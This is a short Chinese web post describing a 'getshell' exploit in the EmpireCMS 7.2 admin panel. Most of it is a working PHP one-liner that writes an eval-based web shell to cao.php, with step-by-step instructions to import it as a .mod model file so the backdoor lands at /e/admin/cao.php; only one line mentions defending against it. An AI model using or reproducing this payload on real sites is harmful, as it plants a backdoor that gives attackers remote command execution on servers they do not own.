帝国cms7.2后台getshell漏洞
1、php一句话内容:<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>保存为1.php.mod进入后台---系统设置---管理数据表---管理系统模型---导入新型模块导入之后马儿就躺在了/e/admin/cao.php。
2、所以大家用帝国cms的要防范这个漏洞,纯属干货分享。
声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
阅读量:62
阅读量:25
阅读量:88
阅读量:81
阅读量:23